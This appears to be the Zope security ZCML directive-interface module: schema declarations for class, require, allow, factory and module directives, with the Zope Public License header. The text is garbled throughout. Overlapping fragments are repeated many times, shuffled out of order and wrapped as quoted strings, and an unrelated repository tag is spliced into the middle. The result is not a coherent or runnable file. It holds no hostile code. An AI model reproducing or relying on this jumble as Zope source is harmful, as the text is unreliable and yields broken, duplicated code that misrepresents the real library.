Access \" u\"will be provided", "value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interfaces\"), description=_(\"The listed interfaces' methods and attributes\" \"", "for use in the 'add content' menu\" \" of a management interface\"), required=False,", ") class IImplementsSubdirective(zope.interface.Interface): \"\"\"Declare that the class given by the content directive's class", "title=u\"Module\", description=u\"Pointer to the module object.\", required=True) class IAllow(Interface): \"\"\"Allow access to selected", "# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.", "import GlobalObject, GlobalInterface from zope.configuration.fields import Tokens, PythonIdentifier import zope.interface import zope.schema from", "listed in the interface attribute. \"\"\" attributes = Tokens( title=u\"Attributes\", description=u\"The attributes to", "import zope.interface import zope.schema from zope.interface import Interface import zope.security.zcml from zope.security.i18n import", "import zope.configuration.fields from zope.configuration.fields import GlobalObject, GlobalInterface from zope.configuration.fields import Tokens, PythonIdentifier import", "architecture related 'zope' ZCML namespace directive interfaces \"\"\" __docformat__ = 'restructuredtext' import zope.configuration.fields", "to selected module attributes Access is unconditionally allowed to any names provided directly", "to access any names provided directly in the attributes attribute or any names", "WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF", "like_class = zope.configuration.fields.GlobalObject( title=_(\"Configure like this class\"), description=_(\"\"\" This argument says that this", "names defined by the \" u\"interface(s). Multiple interfaces can be supplied.\"), value_type=GlobalInterface(), required=False)", "the interface attribute. \"\"\" attributes = Tokens( title=u\"Attributes\", description=u\"The attributes to provide access", "given, defaults to the literal string given as the content directive's 'class' attribute.\"\"\"),", "attributes attribute or to any names defined by interfaces listed in the interface", "provide access to.\", value_type=PythonIdentifier(), required=False) interface = Tokens( title=u\"Interface\", description=(u\"Interfaces whos names to", "required=True ) class IImplementsSubdirective(zope.interface.Interface): \"\"\"Declare that the class given by the content directive's", "value_type=zope.configuration.fields.PythonIdentifier(), ) set_attributes = zope.configuration.fields.Tokens( title=_(\"Attributes that can be set\"), description=_(\"This is a", "to the literal string given as the content directive's 'class' attribute.\"\"\"), required=False, )", ") class IAllowSubdirective(zope.interface.Interface): \"\"\" Declare a part of the class to be publicly", "zope.interface import Interface import zope.security.zcml from zope.security.i18n import ZopeMessageFactory as _ from zope.security.zcml", "two attributes may be used. \"\"\" attributes = zope.configuration.fields.Tokens( title=_(\"Attributes\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), )", "factory identification scheme. If not given, defaults to the literal string given as", "in the attributes attribute or to any names defined by interfaces listed in", "description=_(\"Text suitable for use in the 'add content' menu\" \" of a management", "License, # Version 2.1 (ZPL). 
A copy of the ZPL should accompany this", "of the names defined by the \" u\"interface(s). Multiple interfaces can be supplied.\"),", "class IRequireSubdirective(zope.interface.Interface): \"\"\"Indicate that the a specified list of names or the names", "permission = zope.security.zcml.Permission( title=_(\"Permission\"), description=_(\"\"\" Specifies the permission by id that will be", "set\"), description=_(\"This is a list of attributes that can be\" \" modified/mutated.\"), required=False,", "PythonIdentifier import zope.interface import zope.schema from zope.interface import Interface import zope.security.zcml from zope.security.i18n", "value_type=GlobalInterface(), required=False) class IRequire(Interface): \"\"\"Require a permission to access selected module attributes The", "zope.security.zcml from zope.security.i18n import ZopeMessageFactory as _ from zope.security.zcml import Permission class IClassDirective(zope.interface.Interface):", "identifier for this factory in the ZMI factory identification scheme. If not given,", "that can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interfaces\"), description=_(\"The", "or more interfaces\"), required=True, value_type=zope.configuration.fields.GlobalInterface() ) class IRequireSubdirective(zope.interface.Interface): \"\"\"Indicate that the a specified", "of what this\" \" factory does\"), required=False, ) class IModule(Interface): \"\"\"Group security declarations", "title=u\"Attributes\", description=u\"The attributes to require permission for.\", value_type=PythonIdentifier(), required=False) permission = Permission( title=u\"Permission", "string given as the content directive's 'class' attribute.\"\"\"), required=False, ) title = zope.configuration.fields.MessageID(", "to access or mutate the attributes and methods specified.\"\"\"), required=False, ) attributes =", "############################################################################## # # Copyright (c) 2001, 2002 Zope Foundation and Contributors. # All", "more interfaces\"), required=True, value_type=zope.configuration.fields.GlobalInterface() ) class IRequireSubdirective(zope.interface.Interface): \"\"\"Indicate that the a specified list", "directive's 'class' attribute.\"\"\"), required=False, ) title = zope.configuration.fields.MessageID( title=_(\"Title\"), description=_(\"Text suitable for use", "TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS # FOR A PARTICULAR PURPOSE. # ##############################################################################", "interface\"), required=False, ) description = zope.configuration.fields.MessageID( title=_(\"Description\"), description=_(\"Longer narrative description of what this\"", "zope.interface import zope.schema from zope.interface import Interface import zope.security.zcml from zope.security.i18n import ZopeMessageFactory", "access. \"\"\" permission = zope.security.zcml.Permission( title=_(\"Permission\"), description=_(\"\"\" Specifies the permission by id that", "required=True) class IAllow(Interface): \"\"\"Allow access to selected module attributes Access is unconditionally allowed", "IMPLIED # WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED #", "provided directly in the attributes attribute or any names defined by interfaces listed", "by interfaces listed in the interface attribute. 
\"\"\" attributes = Tokens( title=u\"Attributes\", description=u\"The", "title=_(\"Class\"), required=True ) class IImplementsSubdirective(zope.interface.Interface): \"\"\"Declare that the class given by the content", "to any names provided directly in the attributes attribute or to any names", "a given Interface require a given permission for access. \"\"\" permission = zope.security.zcml.Permission(", "can be set\"), description=_(\"This is a list of attributes that can be\" \"", "the literal string given as the content directive's 'class' attribute.\"\"\"), required=False, ) title", ") interface = zope.configuration.fields.Tokens( title=_(\"Interfaces\"), description=_(\"The listed interfaces' methods and attributes\" \" can", "# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS # FOR A PARTICULAR", "provisions of the Zope Public License, # Version 2.1 (ZPL). A copy of", "that can be set\"), description=_(\"This is a list of attributes that can be\"", "IMPLIED # WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS # FOR A", "title=_(\"Interfaces\"), description=_(\"The listed interfaces' methods and attributes\" \" can be accessed.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(),", "this class\"), description=_(\"\"\" This argument says that this content class should be configured", "Tokens( title=u\"Attributes\", description=u\"The attributes to provide access to.\", value_type=PythonIdentifier(), required=False) interface = Tokens(", "This software is subject to the provisions of the Zope Public License, #", "to provide access to.\", value_type=PythonIdentifier(), required=False) interface = Tokens( title=u\"Interface\", description=(u\"Interfaces whos names", "and methods specified.\"\"\"), required=False, ) attributes = zope.configuration.fields.Tokens( title=_(\"Attributes and methods\"), description=_(\"This is", "names provided directly in the attributes attribute or to any names defined by", "IClassDirective(zope.interface.Interface): \"\"\"Make statements about a class\"\"\" class_ = zope.configuration.fields.GlobalObject( title=_(\"Class\"), required=True ) class", "methods\"), description=_(\"This is a list of attributes and methods\" \" that can be", "the attributes and methods specified.\"\"\"), required=False, ) attributes = zope.configuration.fields.Tokens( title=_(\"Attributes and methods\"),", "be accessed.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) set_attributes = zope.configuration.fields.Tokens( title=_(\"Attributes that can be set\"),", "schemas' properties can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) like_class = zope.configuration.fields.GlobalObject( title=_(\"Configure", "attribute or to any names defined by interfaces listed in the interface attribute.", "attributes The given permission is required to access any names provided directly in", "class attribute implements a given interface \"\"\" interface = zope.configuration.fields.Tokens( title=_(\"One or more", "title=_(\"Attributes and methods\"), description=_(\"This is a list of attributes and methods\" \" that", "Tokens( title=u\"Interface\", description=(u\"Interfaces whos names to provide access to. Access \" u\"will be", "title = zope.configuration.fields.MessageID( title=_(\"Title\"), description=_(\"Text suitable for use in the 'add content' menu\"", "MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS # FOR A PARTICULAR PURPOSE. 
# ############################################################################## \"\"\"Component", "methods specified.\"\"\"), required=False, ) attributes = zope.configuration.fields.Tokens( title=_(\"Attributes and methods\"), description=_(\"This is a", "IFactorySubdirective(zope.interface.Interface): \"\"\"Specify the factory used to create this content object\"\"\" id = zope.schema.Id(", "attributes attribute or any names defined by interfaces listed in the interface attribute.", "permission by id that will be required to access or mutate the attributes", "\" modified/mutated.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) like_class = zope.configuration.fields.GlobalObject( title=_(\"Configure like this class\"), description=_(\"\"\"", "will be required to access or mutate the attributes and methods specified.\"\"\"), required=False,", "to be publicly viewable (that is, requires the zope.Public permission). Only one of", "the zope.Public permission). Only one of the following two attributes may be used.", "zope.Public permission). Only one of the following two attributes may be used. \"\"\"", "_ from zope.security.zcml import Permission class IClassDirective(zope.interface.Interface): \"\"\"Make statements about a class\"\"\" class_", "the 'add content' menu\" \" of a management interface\"), required=False, ) description =", "of the Zope Public License, # Version 2.1 (ZPL). A copy of the", "import zope.schema from zope.interface import Interface import zope.security.zcml from zope.security.i18n import ZopeMessageFactory as", "the schema can be set\"), description=_(\"The listed schemas' properties can be\" \" modified/mutated.\"),", "\"\"\"Specify the factory used to create this content object\"\"\" id = zope.schema.Id( title=_(\"ID\"),", "require permission for.\", value_type=PythonIdentifier(), required=False) permission = Permission( title=u\"Permission ID\", description=u\"The ID of", "the names defined by the \" u\"interface(s). Multiple interfaces can be supplied.\"), value_type=GlobalInterface(),", "EXPRESS OR IMPLIED # WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE", "viewable (that is, requires the zope.Public permission). Only one of the following two", "can be set\"), description=_(\"The listed schemas' properties can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(),", "All Rights Reserved. 
# # This software is subject to the provisions of", ") title = zope.configuration.fields.MessageID( title=_(\"Title\"), description=_(\"Text suitable for use in the 'add content'", "class_ = zope.configuration.fields.GlobalObject( title=_(\"Class\"), required=True ) class IImplementsSubdirective(zope.interface.Interface): \"\"\"Declare that the class given", "'class' attribute.\"\"\"), required=False, ) title = zope.configuration.fields.MessageID( title=_(\"Title\"), description=_(\"Text suitable for use in", "of a management interface\"), required=False, ) description = zope.configuration.fields.MessageID( title=_(\"Description\"), description=_(\"Longer narrative description", "If not given, defaults to the literal string given as the content directive's", "can be accessed.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) set_attributes = zope.configuration.fields.Tokens( title=_(\"Attributes that can be", "directly in the attributes attribute or to any names defined by interfaces listed", "zope.configuration.fields.Tokens( title=_(\"Interfaces\"), description=_(\"The listed interfaces' methods and attributes\" \" can be accessed.\"), required=False,", ") attributes = zope.configuration.fields.Tokens( title=_(\"Attributes and methods\"), description=_(\"This is a list of attributes", "specified list of names or the names in a given Interface require a", "attributes and methods\" \" that can be accessed.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) set_attributes =", "be used.\"\"\"), required=False, ) class IAllowSubdirective(zope.interface.Interface): \"\"\" Declare a part of the class", "this content object\"\"\" id = zope.schema.Id( title=_(\"ID\"), description=_(\"\"\" the identifier for this factory", "the class given by the content directive's class attribute implements a given interface", "zope.configuration.fields.MessageID( title=_(\"Description\"), description=_(\"Longer narrative description of what this\" \" factory does\"), required=False, )", "required=False, ) class IAllowSubdirective(zope.interface.Interface): \"\"\" Declare a part of the class to be", "Multiple interfaces can be supplied.\"), value_type=GlobalInterface(), required=False) class IRequire(Interface): \"\"\"Require a permission to", "for.\", value_type=PythonIdentifier(), required=False) permission = Permission( title=u\"Permission ID\", description=u\"The ID of the permission", ") set_schema = zope.configuration.fields.Tokens( title=_(\"The attributes specified by the schema can be set\"),", "the module object.\", required=True) class IAllow(Interface): \"\"\"Allow access to selected module attributes Access", "IRequire(Interface): \"\"\"Require a permission to access selected module attributes The given permission is", "provided directly in the attributes attribute or to any names defined by interfaces", "description=_(\"Longer narrative description of what this\" \" factory does\"), required=False, ) class IModule(Interface):", "2001, 2002 Zope Foundation and Contributors. # All Rights Reserved. # # This", "module object.\", required=True) class IAllow(Interface): \"\"\"Allow access to selected module attributes Access is", "interface attribute. \"\"\" attributes = Tokens( title=u\"Attributes\", description=u\"The attributes to require permission for.\",", "this distribution. 
# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL", "= zope.configuration.fields.Tokens( title=_(\"Attributes that can be set\"), description=_(\"This is a list of attributes", "IAllow(Interface): \"\"\"Allow access to selected module attributes Access is unconditionally allowed to any", "a permission to access selected module attributes The given permission is required to", ") description = zope.configuration.fields.MessageID( title=_(\"Description\"), description=_(\"Longer narrative description of what this\" \" factory", "attributes and methods specified.\"\"\"), required=False, ) attributes = zope.configuration.fields.Tokens( title=_(\"Attributes and methods\"), description=_(\"This", "attributes specified by the schema can be set\"), description=_(\"The listed schemas' properties can", "title=u\"Attributes\", description=u\"The attributes to provide access to.\", value_type=PythonIdentifier(), required=False) interface = Tokens( title=u\"Interface\",", "\"\"\"Require a permission to access selected module attributes The given permission is required", "required=False, value_type=zope.configuration.fields.GlobalInterface(), ) set_schema = zope.configuration.fields.Tokens( title=_(\"The attributes specified by the schema can", "description=_(\"The listed schemas' properties can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) like_class =", "\" that can be accessed.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) set_attributes = zope.configuration.fields.Tokens( title=_(\"Attributes that", "should accompany this distribution. # THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY", "a specified list of names or the names in a given Interface require", "zope.configuration.fields.MessageID( title=_(\"Title\"), description=_(\"Text suitable for use in the 'add content' menu\" \" of", "factory in the ZMI factory identification scheme. If not given, defaults to the", "OR IMPLIED # WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED", "= zope.configuration.fields.Tokens( title=_(\"The attributes specified by the schema can be set\"), description=_(\"The listed", ") like_class = zope.configuration.fields.GlobalObject( title=_(\"Configure like this class\"), description=_(\"\"\" This argument says that", "for access. \"\"\" permission = zope.security.zcml.Permission( title=_(\"Permission\"), description=_(\"\"\" Specifies the permission by id", "module attributes Access is unconditionally allowed to any names provided directly in the", "the ZMI factory identification scheme. If not given, defaults to the literal string", "import zope.security.zcml from zope.security.i18n import ZopeMessageFactory as _ from zope.security.zcml import Permission class", "given permission for access. \"\"\" permission = zope.security.zcml.Permission( title=_(\"Permission\"), description=_(\"\"\" Specifies the permission", "interfaces listed in the interface attribute. 
\"\"\" attributes = Tokens( title=u\"Attributes\", description=u\"The attributes", "IRequireSubdirective(zope.interface.Interface): \"\"\"Indicate that the a specified list of names or the names in", "Permission class IClassDirective(zope.interface.Interface): \"\"\"Make statements about a class\"\"\" class_ = zope.configuration.fields.GlobalObject( title=_(\"Class\"), required=True", "says that this content class should be configured in the same way the", "specified.\"\"\"), required=False, ) attributes = zope.configuration.fields.Tokens( title=_(\"Attributes and methods\"), description=_(\"This is a list", "may be used. \"\"\" attributes = zope.configuration.fields.Tokens( title=_(\"Attributes\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface =", "permission is required to access any names provided directly in the attributes attribute", "'restructuredtext' import zope.configuration.fields from zope.configuration.fields import GlobalObject, GlobalInterface from zope.configuration.fields import Tokens, PythonIdentifier", "IAllowSubdirective(zope.interface.Interface): \"\"\" Declare a part of the class to be publicly viewable (that", "interface = zope.configuration.fields.Tokens( title=_(\"One or more interfaces\"), required=True, value_type=zope.configuration.fields.GlobalInterface() ) class IRequireSubdirective(zope.interface.Interface): \"\"\"Indicate", "TO, THE IMPLIED # WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS #", "a given interface \"\"\" interface = zope.configuration.fields.Tokens( title=_(\"One or more interfaces\"), required=True, value_type=zope.configuration.fields.GlobalInterface()", "module attributes The given permission is required to access any names provided directly", "given Interface require a given permission for access. \"\"\" permission = zope.security.zcml.Permission( title=_(\"Permission\"),", "provide access to. Access \" u\"will be provided to all of the names", "of the following two attributes may be used. \"\"\" attributes = zope.configuration.fields.Tokens( title=_(\"Attributes\"),", "class IAllowSubdirective(zope.interface.Interface): \"\"\" Declare a part of the class to be publicly viewable", "class\"), description=_(\"\"\" This argument says that this content class should be configured in", "in the interface attribute. \"\"\" attributes = Tokens( title=u\"Attributes\", description=u\"The attributes to require", "title=_(\"Configure like this class\"), description=_(\"\"\" This argument says that this content class should", "DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF TITLE, MERCHANTABILITY,", "set_schema = zope.configuration.fields.Tokens( title=_(\"The attributes specified by the schema can be set\"), description=_(\"The", "WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS # FOR A PARTICULAR PURPOSE.", "create this content object\"\"\" id = zope.schema.Id( title=_(\"ID\"), description=_(\"\"\" the identifier for this", "is specified, no other argument can be used.\"\"\"), required=False, ) class IAllowSubdirective(zope.interface.Interface): \"\"\"", "Copyright (c) 2001, 2002 Zope Foundation and Contributors. # All Rights Reserved. #", "AND FITNESS # FOR A PARTICULAR PURPOSE. 
# ############################################################################## \"\"\"Component architecture related 'zope'", "is a list of attributes that can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), )", "zope.configuration.fields.GlobalObject( title=_(\"Configure like this class\"), description=_(\"\"\" This argument says that this content class", "a list of attributes that can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface", "\" u\"will be provided to all of the names defined by the \"", "the a specified list of names or the names in a given Interface", "factory used to create this content object\"\"\" id = zope.schema.Id( title=_(\"ID\"), description=_(\"\"\" the", "to the module object.\", required=True) class IAllow(Interface): \"\"\"Allow access to selected module attributes", "zope.configuration.fields.Tokens( title=_(\"One or more interfaces\"), required=True, value_type=zope.configuration.fields.GlobalInterface() ) class IRequireSubdirective(zope.interface.Interface): \"\"\"Indicate that the", "# FOR A PARTICULAR PURPOSE. # ############################################################################## \"\"\"Component architecture related 'zope' ZCML namespace", "IModule(Interface): \"\"\"Group security declarations about a module\"\"\" module = GlobalObject( title=u\"Module\", description=u\"Pointer to", "is unconditionally allowed to any names provided directly in the attributes attribute or", "class should be configured in the same way the specified class' security is.", "(ZPL). A copy of the ZPL should accompany this distribution. # THIS SOFTWARE", "to create this content object\"\"\" id = zope.schema.Id( title=_(\"ID\"), description=_(\"\"\" the identifier for", "zope.configuration.fields.GlobalObject( title=_(\"Class\"), required=True ) class IImplementsSubdirective(zope.interface.Interface): \"\"\"Declare that the class given by the", "= Tokens( title=u\"Attributes\", description=u\"The attributes to provide access to.\", value_type=PythonIdentifier(), required=False) interface =", "in the 'add content' menu\" \" of a management interface\"), required=False, ) description", ") interface = zope.configuration.fields.Tokens( title=_(\"Interface\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) class IFactorySubdirective(zope.interface.Interface): \"\"\"Specify the factory", "class IFactorySubdirective(zope.interface.Interface): \"\"\"Specify the factory used to create this content object\"\"\" id =", "Zope Public License, # Version 2.1 (ZPL). A copy of the ZPL should", "attributes = Tokens( title=u\"Attributes\", description=u\"The attributes to require permission for.\", value_type=PythonIdentifier(), required=False) permission", "ANY AND ALL EXPRESS OR IMPLIED # WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT", "A PARTICULAR PURPOSE. # ############################################################################## \"\"\"Component architecture related 'zope' ZCML namespace directive interfaces", "provided to all of the names defined by the \" u\"interface(s). 
Multiple interfaces", "and methods\" \" that can be accessed.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) set_attributes = zope.configuration.fields.Tokens(", "title=_(\"Description\"), description=_(\"Longer narrative description of what this\" \" factory does\"), required=False, ) class", "# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR", "by the schema can be set\"), description=_(\"The listed schemas' properties can be\" \"", "2002 Zope Foundation and Contributors. # All Rights Reserved. # # This software", "attributes may be used. \"\"\" attributes = zope.configuration.fields.Tokens( title=_(\"Attributes\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface", "\" modified/mutated.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interfaces\"), description=_(\"The listed interfaces' methods", "module\"\"\" module = GlobalObject( title=u\"Module\", description=u\"Pointer to the module object.\", required=True) class IAllow(Interface):", "\"\"\" attributes = Tokens( title=u\"Attributes\", description=u\"The attributes to require permission for.\", value_type=PythonIdentifier(), required=False)", "a module\"\"\" module = GlobalObject( title=u\"Module\", description=u\"Pointer to the module object.\", required=True) class", "Foundation and Contributors. # All Rights Reserved. # # This software is subject", "subject to the provisions of the Zope Public License, # Version 2.1 (ZPL).", "what this\" \" factory does\"), required=False, ) class IModule(Interface): \"\"\"Group security declarations about", "or any names defined by interfaces listed in the interface attribute. \"\"\" attributes", "or the names in a given Interface require a given permission for access.", "interface = zope.configuration.fields.Tokens( title=_(\"Interfaces\"), description=_(\"The listed interfaces' methods and attributes\" \" can be", "accessed.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) set_schema = zope.configuration.fields.Tokens( title=_(\"The attributes specified by the schema", "title=_(\"One or more interfaces\"), required=True, value_type=zope.configuration.fields.GlobalInterface() ) class IRequireSubdirective(zope.interface.Interface): \"\"\"Indicate that the a", "content class should be configured in the same way the specified class' security", "that will be required to access or mutate the attributes and methods specified.\"\"\"),", "the Zope Public License, # Version 2.1 (ZPL). A copy of the ZPL", "# Copyright (c) 2001, 2002 Zope Foundation and Contributors. # All Rights Reserved.", "PARTICULAR PURPOSE. # ############################################################################## \"\"\"Component architecture related 'zope' ZCML namespace directive interfaces \"\"\"", "INFRINGEMENT, AND FITNESS # FOR A PARTICULAR PURPOSE. # ############################################################################## \"\"\"Component architecture related", "the specified class' security is. If this argument is specified, no other argument", "A copy of the ZPL should accompany this distribution. 
# THIS SOFTWARE IS", "attributes = zope.configuration.fields.Tokens( title=_(\"Attributes and methods\"), description=_(\"This is a list of attributes and", "used to create this content object\"\"\" id = zope.schema.Id( title=_(\"ID\"), description=_(\"\"\" the identifier", "description=_(\"\"\" Specifies the permission by id that will be required to access or", "access or mutate the attributes and methods specified.\"\"\"), required=False, ) attributes = zope.configuration.fields.Tokens(", "\"\"\" attributes = Tokens( title=u\"Attributes\", description=u\"The attributes to provide access to.\", value_type=PythonIdentifier(), required=False)", "be accessed.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) set_schema = zope.configuration.fields.Tokens( title=_(\"The attributes specified by the", "the attributes attribute or to any names defined by interfaces listed in the", "names to provide access to. Access \" u\"will be provided to all of", "given permission is required to access any names provided directly in the attributes", "The given permission is required to access any names provided directly in the", "ZPL should accompany this distribution. # THIS SOFTWARE IS PROVIDED \"AS IS\" AND", "and Contributors. # All Rights Reserved. # # This software is subject to", "the following two attributes may be used. \"\"\" attributes = zope.configuration.fields.Tokens( title=_(\"Attributes\"), required=False,", "interfaces \"\"\" __docformat__ = 'restructuredtext' import zope.configuration.fields from zope.configuration.fields import GlobalObject, GlobalInterface from", "zope.configuration.fields from zope.configuration.fields import GlobalObject, GlobalInterface from zope.configuration.fields import Tokens, PythonIdentifier import zope.interface", "attribute.\"\"\"), required=False, ) title = zope.configuration.fields.MessageID( title=_(\"Title\"), description=_(\"Text suitable for use in the", "selected module attributes Access is unconditionally allowed to any names provided directly in", "can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interfaces\"), description=_(\"The listed", "be supplied.\"), value_type=GlobalInterface(), required=False) class IRequire(Interface): \"\"\"Require a permission to access selected module", "declarations about a module\"\"\" module = GlobalObject( title=u\"Module\", description=u\"Pointer to the module object.\",", "in the attributes attribute or any names defined by interfaces listed in the", "allowed to any names provided directly in the attributes attribute or to any", "zope.configuration.fields.Tokens( title=_(\"Attributes that can be set\"), description=_(\"This is a list of attributes that", "given by the content directive's class attribute implements a given interface \"\"\" interface", "namespace directive interfaces \"\"\" __docformat__ = 'restructuredtext' import zope.configuration.fields from zope.configuration.fields import GlobalObject,", "the content directive's class attribute implements a given interface \"\"\" interface = zope.configuration.fields.Tokens(", "defined by interfaces listed in the interface attribute. 
\"\"\" attributes = Tokens( title=u\"Attributes\",", "access selected module attributes The given permission is required to access any names", "\"\"\"Component architecture related 'zope' ZCML namespace directive interfaces \"\"\" __docformat__ = 'restructuredtext' import", "If this argument is specified, no other argument can be used.\"\"\"), required=False, )", "configured in the same way the specified class' security is. If this argument", "Specifies the permission by id that will be required to access or mutate", "zope.security.zcml import Permission class IClassDirective(zope.interface.Interface): \"\"\"Make statements about a class\"\"\" class_ = zope.configuration.fields.GlobalObject(", "class\"\"\" class_ = zope.configuration.fields.GlobalObject( title=_(\"Class\"), required=True ) class IImplementsSubdirective(zope.interface.Interface): \"\"\"Declare that the class", "attributes Access is unconditionally allowed to any names provided directly in the attributes", "to. Access \" u\"will be provided to all of the names defined by", "u\"interface(s). Multiple interfaces can be supplied.\"), value_type=GlobalInterface(), required=False) class IRequire(Interface): \"\"\"Require a permission", "to all of the names defined by the \" u\"interface(s). Multiple interfaces can", "literal string given as the content directive's 'class' attribute.\"\"\"), required=False, ) title =", "description=_(\"This is a list of attributes that can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(),", "is a list of attributes and methods\" \" that can be accessed.\"), required=False,", "specified class' security is. If this argument is specified, no other argument can", "Declare a part of the class to be publicly viewable (that is, requires", "as the content directive's 'class' attribute.\"\"\"), required=False, ) title = zope.configuration.fields.MessageID( title=_(\"Title\"), description=_(\"Text", "IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED # WARRANTIES", "be set\"), description=_(\"This is a list of attributes that can be\" \" modified/mutated.\"),", "zope.security.zcml.Permission( title=_(\"Permission\"), description=_(\"\"\" Specifies the permission by id that will be required to", "any names defined by interfaces listed in the interface attribute. \"\"\" attributes =", "BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT,", "Tokens( title=u\"Attributes\", description=u\"The attributes to require permission for.\", value_type=PythonIdentifier(), required=False) permission = Permission(", "<reponame>manliu1225/Facebook_crawler ############################################################################## # # Copyright (c) 2001, 2002 Zope Foundation and Contributors. #", "and attributes\" \" can be accessed.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) set_schema = zope.configuration.fields.Tokens( title=_(\"The", "############################################################################## \"\"\"Component architecture related 'zope' ZCML namespace directive interfaces \"\"\" __docformat__ = 'restructuredtext'", "= zope.configuration.fields.Tokens( title=_(\"One or more interfaces\"), required=True, value_type=zope.configuration.fields.GlobalInterface() ) class IRequireSubdirective(zope.interface.Interface): \"\"\"Indicate that", "following two attributes may be used. 
\"\"\" attributes = zope.configuration.fields.Tokens( title=_(\"Attributes\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(),", "required=False, value_type=zope.configuration.fields.GlobalInterface(), ) class IFactorySubdirective(zope.interface.Interface): \"\"\"Specify the factory used to create this content", "supplied.\"), value_type=GlobalInterface(), required=False) class IRequire(Interface): \"\"\"Require a permission to access selected module attributes", "copy of the ZPL should accompany this distribution. # THIS SOFTWARE IS PROVIDED", "by the \" u\"interface(s). Multiple interfaces can be supplied.\"), value_type=GlobalInterface(), required=False) class IRequire(Interface):", "attribute. \"\"\" attributes = Tokens( title=u\"Attributes\", description=u\"The attributes to require permission for.\", value_type=PythonIdentifier(),", "to require permission for.\", value_type=PythonIdentifier(), required=False) permission = Permission( title=u\"Permission ID\", description=u\"The ID", "is, requires the zope.Public permission). Only one of the following two attributes may", "names in a given Interface require a given permission for access. \"\"\" permission", "required to access any names provided directly in the attributes attribute or any", "ALL EXPRESS OR IMPLIED # WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO,", "ZopeMessageFactory as _ from zope.security.zcml import Permission class IClassDirective(zope.interface.Interface): \"\"\"Make statements about a", "mutate the attributes and methods specified.\"\"\"), required=False, ) attributes = zope.configuration.fields.Tokens( title=_(\"Attributes and", "attribute implements a given interface \"\"\" interface = zope.configuration.fields.Tokens( title=_(\"One or more interfaces\"),", "schema can be set\"), description=_(\"The listed schemas' properties can be\" \" modified/mutated.\"), required=False,", "no other argument can be used.\"\"\"), required=False, ) class IAllowSubdirective(zope.interface.Interface): \"\"\" Declare a", "Zope Foundation and Contributors. # All Rights Reserved. # # This software is", "argument can be used.\"\"\"), required=False, ) class IAllowSubdirective(zope.interface.Interface): \"\"\" Declare a part of", "interface attribute. \"\"\" attributes = Tokens( title=u\"Attributes\", description=u\"The attributes to provide access to.\",", "attributes to require permission for.\", value_type=PythonIdentifier(), required=False) permission = Permission( title=u\"Permission ID\", description=u\"The", "ZCML namespace directive interfaces \"\"\" __docformat__ = 'restructuredtext' import zope.configuration.fields from zope.configuration.fields import", "from zope.configuration.fields import GlobalObject, GlobalInterface from zope.configuration.fields import Tokens, PythonIdentifier import zope.interface import", "# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES", "distribution. # THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS", "narrative description of what this\" \" factory does\"), required=False, ) class IModule(Interface): \"\"\"Group", "use in the 'add content' menu\" \" of a management interface\"), required=False, )", "all of the names defined by the \" u\"interface(s). Multiple interfaces can be", "permission for.\", value_type=PythonIdentifier(), required=False) permission = Permission( title=u\"Permission ID\", description=u\"The ID of the", "Reserved. 
